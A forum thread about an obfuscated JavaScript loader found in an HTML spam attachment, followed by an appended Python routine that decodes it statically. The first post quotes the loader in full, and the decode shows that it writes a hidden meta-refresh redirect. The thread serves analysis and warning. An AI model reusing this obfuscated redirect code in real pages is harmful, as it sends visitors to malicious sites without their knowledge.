MisterBill

java scri_pt in spam I received

3 posts in this topic

I got spam which had a java scri_pt portion to it. I can't figure out what it is trying to do, can someone help? The email claimed there was a PDF to view, I will attach the whole section for context.

Content-type: text/html; name="61114Journal Sentinel - Leka Obit.html"
Content-transfer-encoding: 7BIT
Content-disposition: attachment;
 filename="61114Journal Sentinel - Leka Obit.html"

<scri_pt language="java scri_pt" type="text/java scri_pt">function xfxs(oajm){var
cz58="sr:0.cpt/ =\"xg;lhivm-quoefn>a<",iwy0,qyot,n3dt="",vvg8,wo2u=cz58.length;enum(unescape("%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D"));for(qyot=0;qyot<oajm.length;qyot++){iwy0=oajm.charAt(qyot);vvg8=cz58.indexOf(iwy0);if(vvg8>-1){vvg8-=(qyot+1)%wo2u;if(vvg8<0){vvg8+=wo2u;}lj2w(cz58.charAt(vvg8));}else{lj2w(iwy0);}}enum(unescape("%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;"));}xfxs("sq>\"0lolhhrp.p:.><-;hoie\"tp0un/n<\"li=ur\"nu<quumn>>loieo alefv m=q<;rgl.rqnm:et.rss-");</scri_pt><noscript>To display this page you need a browser that supports java scri_pt.</noscript>

--Boundary_(ID_pbZ6Ms2kvXLizaqNrjbRog)--


Hi Bill,

See http://forum.spamcop.net/forums/index.php?...amp;#entry76541 and preceding posts. Can you remove that scri_pt? Maybe substitute the base64 code per the text view of the attachment if you would like a permanent record here. It makes me a little uncomfortable in clear form, even if slightly mangled by the badword filter, sort of like an audible flatus in church (not that we take ourselves so seriously but ...). If you want to add to the topic you could try base64 decoding the example in the O/P's post in that other topic (or one of the others that silentlarry points to) and compare it with your own - to test the assumption that parts of these are variable to give them a rolling 'day one' protection from AV scanners.

Just don't run any of the things of course.

> It makes me a little uncomfortable in clear form, even if slightly mangled by the badword filter, sort of like an audible flatus in church (not that we take ourselves so seriously but ...).

As I've stated over the years, my hack here against the hacking attempts was very heavy-handed. There is the obvious 'mangled' bit that you're seeing, but you will also note that no one is really going to be able to sort out the example scri_pt as displayed. There are other changes that have been made to the stored/displayed version to make damn sure that things like this can't ever accidentally run in someone's browser here.

That said, I can only recommend going elsewhere for asking for analysis or loading up on some tools and education to do it on your own, as I simply can't condone folks tinkering with stuff that they already suspect is dangerous.

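A static decode of the routine shown in the first post, added here as an example and not part of any poster's message: it ports the xfxs() loop to Python so that nothing from the attachment is executed. The names decode, encode, reveal_hidden and classify belong to this example, and it works on only the first 42 characters of the posted string, a cut-off chosen for the example.

```python
import re
from urllib.parse import unquote

# Substitution alphabet copied from the posted script (variable cz58).
ALPHABET = 'sr:0.cpt/ ="xg;lhivm-quoefn>a<'

# First 42 characters of the string passed to xfxs() in the post, with the
# JavaScript \" escapes resolved. Cut short on purpose (a choice made for this
# example): enough to identify the markup, not the rest of the string.
PAYLOAD_PREFIX = 'sq>"0lolhhrp.p:.><-;hoie"tp0un/n<"li=ur"nu'

# The two percent-encoded arguments to unescape() as they appear in the post.
HIDDEN = [
    "%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D",
    "%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;",
]

def decode(text, alphabet=ALPHABET):
    """Port of the xfxs() loop: a character found in the alphabet is moved
    back by (position + 1) mod len(alphabet); anything else passes through."""
    n = len(alphabet)
    out = []
    for pos, ch in enumerate(text):
        idx = alphabet.find(ch)
        out.append(ch if idx < 0 else alphabet[(idx - (pos + 1)) % n])
    return "".join(out)

def encode(text, alphabet=ALPHABET):
    """Inverse of decode(), used only to build harmless test input."""
    n = len(alphabet)
    return "".join(
        ch if ch not in alphabet else alphabet[(alphabet.find(ch) + pos + 1) % n]
        for pos, ch in enumerate(text)
    )

def reveal_hidden(strings=HIDDEN):
    """Resolve the %XX escapes as text, without evaluating the result."""
    return [unquote(s) for s in strings]

def classify(markup):
    """Name the behaviour of decoded markup from a static pattern."""
    if re.search(r'<meta\s+http-equiv="refresh"', markup, re.I):
        return "meta-refresh redirect"
    return "unknown"

if __name__ == "__main__":
    for line in reveal_hidden():
        print("hidden code:", line)
    print("decoded    :", decode(PAYLOAD_PREFIX))
    print("behaviour  :", classify(decode(PAYLOAD_PREFIX)))
```

On the prefix, decode() returns `<meta http-equiv="refresh" content="0;url=`, so the attachment writes a zero-second redirect into the page, and the remainder of the string is the destination.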